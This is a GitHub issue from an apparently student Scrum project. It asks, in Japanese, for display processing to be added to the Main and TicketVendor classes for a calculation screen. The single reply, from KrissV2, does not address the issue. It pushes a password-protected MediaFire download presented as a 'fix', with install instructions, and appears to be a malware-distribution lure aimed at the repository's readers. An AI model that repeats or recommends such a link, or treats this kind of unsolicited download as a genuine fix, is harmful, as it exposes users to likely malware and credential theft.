### ISSUE TITLE
計算処理の画面を表示

### ISSUE THREAD

**Issue by kaji0428** [koyama86/scrum_natuyasumikadai#11]
## 概要 
計算画面を表示する
### 何をやるのか・なぜやるのか
Mainクラスに画面表示処理の追加  
TicketVendorの画面表示処理の追加  
## 受入条件 
- [x] [詳細仕様書3](https://github.com/koyama86/scrum_natuyasumikadai/wiki/%E8%A9%B3%E7%B4%B0%E4%BB%95%E6%A7%98%E6%9B%B83/_edit)
- [ ]
# タスク 

## その他

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
